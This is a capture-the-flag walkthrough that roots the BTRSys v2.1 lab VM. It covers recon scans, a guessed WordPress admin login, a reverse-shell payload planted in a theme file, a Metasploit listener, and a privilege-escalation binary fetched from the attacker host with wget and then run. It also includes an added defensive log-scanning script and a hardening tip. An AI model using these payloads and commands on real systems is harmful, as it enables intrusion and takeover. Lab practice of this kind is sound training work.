BTRSys: v2.1 walkthrough
Hi friends, welcome to hackxsploit. Here is the complete walkthrough of the BTRSys: v2.1 CTF. It is a beginner-level CTF. Download it from here. This is a Boot2Root CTF VM. I hope you enjoy it.
So let's crack it.
Objective: Get root access to the system
Attacking machine: Linux kali 4.17.0-kali1-amd64
Target machine: BTRSys: v2.1, IP: 172.16.166.149
**It is recommended to scan the IP with nmap, dirb and nikto first.**
--------------------------------------------------------------------------------------------------------------------------------
Let's start by getting the IP of the BTRSys VM with this command:
# arp-scan -l
Now scan the IP with nmap:
# nmap -sSCV 172.16.166.149
Now scan the IP with dirb:
# dirb http://172.16.166.149
Since port 80 is open, we open the IP directly in the browser:
http://172.16.166.149
Now open http://172.16.166.149/robots.txt.
It lists a directory, wordpress.
Now open http://172.16.166.149/wordpress
This confirms that it is a WordPress site.
Next we go to http://172.16.166.149/wordpress/wp-admin
Log in to WordPress by trial and error.
id = admin
password = admin
Here we can plant a reverse backdoor payload with the help of msfvenom and listen for it with Metasploit.
So open a terminal and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.166.163 lport=4444
Then copy the code from the terminal.
Now paste this code into the WordPress page:
Appearance --> Editor --> 404.php
**Remove the existing code, paste this code, and then click on Update File.**
Our backdoor code is now in place.
Now start Metasploit to listen, and type the following commands (172.16.166.163 is my local IP):
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 172.16.166.163
set lport 4444
exploit
After running exploit, go to the following link in the browser:
http://172.16.166.149/wordpress/wp-content/themes/twentyfourteen/404.php
Requesting this URL executes our payload and gives us a meterpreter session.
We got our meterpreter shell.
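Seen from the defender's side, the steps above leave a recognisable trail in the web server's access log: a save in the theme editor followed by a direct request for a theme template file. The Python script below is an added example, not part of the original walkthrough; the log lines are constructed, and the rule names, the Apache combined log format and the editor saving through theme-editor.php are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not taken from the VM).
SAMPLE_LOG = """\
172.16.166.163 - - [10/Sep/2018:10:01:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
172.16.166.163 - - [10/Sep/2018:10:03:40 +0000] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
172.16.166.163 - - [10/Sep/2018:10:04:15 +0000] "GET /wordpress/wp-content/themes/twentyfourteen/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
172.16.166.20 - - [10/Sep/2018:10:05:00 +0000] "GET /wordpress/wp-content/themes/twentyfourteen/style.css HTTP/1.1" 200 7231 "-" "Mozilla/5.0"
172.16.166.20 - - [10/Sep/2018:10:05:09 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Hypothetical rule names. Rule 1 assumes the editor saves with a POST to
# theme-editor.php; adjust the path for the WordPress version you run.
# Rule 2: WordPress loads theme templates through index.php, so a request
# that names a theme .php file directly is unusual.
RULES = [
    ("theme-file-edit",
     lambda m, p: m == "POST" and p.endswith("/wp-admin/theme-editor.php")),
    ("direct-theme-php",
     lambda m, p: re.search(r"/wp-content/themes/[^/]+/.*\.php$", p) is not None),
]

def scan(log_text):
    """Return (source_ip, rule_name, path) for every log line a rule matches."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        path = match["path"].split("?", 1)[0]  # ignore the query string
        for name, rule in RULES:
            if rule(match["method"], path):
                findings.append((match["ip"], name, path))
    return findings

def correlated_sources(findings):
    """Source IPs that triggered every rule: an edit plus a direct template hit."""
    seen = defaultdict(set)
    for ip, name, _ in findings:
        seen[ip].add(name)
    return sorted(ip for ip, names in seen.items() if len(names) == len(RULES))

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    print(hits, correlated_sources(hits))
```

Setting define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the built-in theme and plugin editor, which closes this path even for an account whose password has been guessed.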
Here we have a shell but no root access.
So we have to download a local privilege escalation exploit from this link:
https://www.exploit-db.com/exploits/44298/
We use this exploit from Exploit-DB to get root access.
Download the exploit on your Kali machine and transfer it to the target machine by creating a local Python HTTP server.
*** Download the exploit on your Kali machine and go to the download folder.
Compile 44298.c with this command in a terminal:
# gcc 44298.c -o 44298
*** Create a local server with this command on your Kali machine:
# python -m SimpleHTTPServer 8080
*** Now go to your meterpreter shell and type these commands:
cd /tmp
wget http://172.16.166.163:8080/44298
chmod 777 44298
./44298
After that we have root.
Test it with the whoami command.
**** If you have problems fetching the exploit from meterpreter, read about how to create a local Python HTTP server and how to access any exploit from our meterpreter session by creating a local Python HTTP server. ****
*** Read about local privilege escalation; it plays a crucial role in any CTF. ***
Give feedback to
princelucideus121@gmail.com